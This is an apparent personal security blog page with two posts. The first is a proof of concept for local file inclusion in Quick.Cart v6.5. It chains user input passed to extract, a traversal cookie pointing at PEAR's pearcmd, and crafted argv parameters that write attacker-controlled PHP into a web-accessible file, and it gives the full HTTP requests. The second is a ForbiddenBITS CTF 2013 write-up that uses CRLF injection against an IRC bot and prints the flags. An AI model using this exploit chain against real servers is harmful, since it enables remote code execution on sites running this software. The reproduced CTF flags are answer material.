AchN30

IT Security Enthusiast

POC - Quick.Cart v6.5 - Local File Inclusion

[LFI] Quick.Cart v6.5

admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...

Funny, passing user input directly to extract x) --- We will need this later...

admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...

Lets digg here :p

database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) && 
    !empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) && 
 $config['change_language_to_polish'] === true && 
 preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
  if( isset( $_COOKIE['sAdminLanguage'] ) )
    $config['admin_lang']= $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' ) ? $config['dir_lang'].LANGUAGE.'.php' : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' ) ? $config['dir_lang'].$config['admin_lang'].'.php' : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...

1. in "admin.php" CUSTOMER_PAGE is not defined
2. we can set the header "Accept-Language: pl-PL,pl;"
3. we control the cookies too

Means! 
$config['admin_lang'] is controlled :D

So, we can include any file ends ".php"
The file address must be a real file (is_file) -_-"
Actually nothing good todo... 

maybe we can use PEAR sources :p

GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

Well done ... lets use the "extract($_GET)" to pass arguments to PEAR
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
tricky :p ...

GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close

file created :)

[ForbiddenBITS CTF 2013] [Writeup] [Hidden1 & Hidden2]

In the CTF IRC Channel (irc://freenode.net/forbiddenbits) we see
in description:
//try to have fun with our bot :D

So we tried to execute some commands, and we got some of them "!", "!help" , "!flag", "!hidden", ...

[16:26] <AchN30_> !help
[16:26] <[FB]BOTx> 8,1 ima stupid bot :

Hidden Challenge 01:

[16:50] <AchN30_> !flag
[16:50] <[FB]BOTx> Here's Your Bloody Flag {bcba84b2e0774f4d30d630d7bce8afa1}

Flag: bcba84b2e0774f4d30d630d7bce8afa1

Hidden Challenge 02:

[16:28] <AchN30_> !hidden
[16:28] <[FB]BOTx> Make me say "CAN I HAZ FLAG" to Stephnix, dont forget to mention your nickname

Hmmms Let's try CrLf Injection..

[16:43] <AchN30_> test\n PRIVMSG AchN30_ :HEllO WORLD!
[16:43] <[FB]BOTx> test
[16:43] <[FB]BOTx> HEllO WORLD!
now we can query Stephnix to get the flag

Cool, now let's get the flag :)

[16:47] <AchN30_> \n PRIVMSG Stephnix :AchN30_: CAN I HAZ FLAG
after couple of minutes Stephnix query AchN30_ the flag

Flag: c272047fb6327750109b0f9b95d2e6f4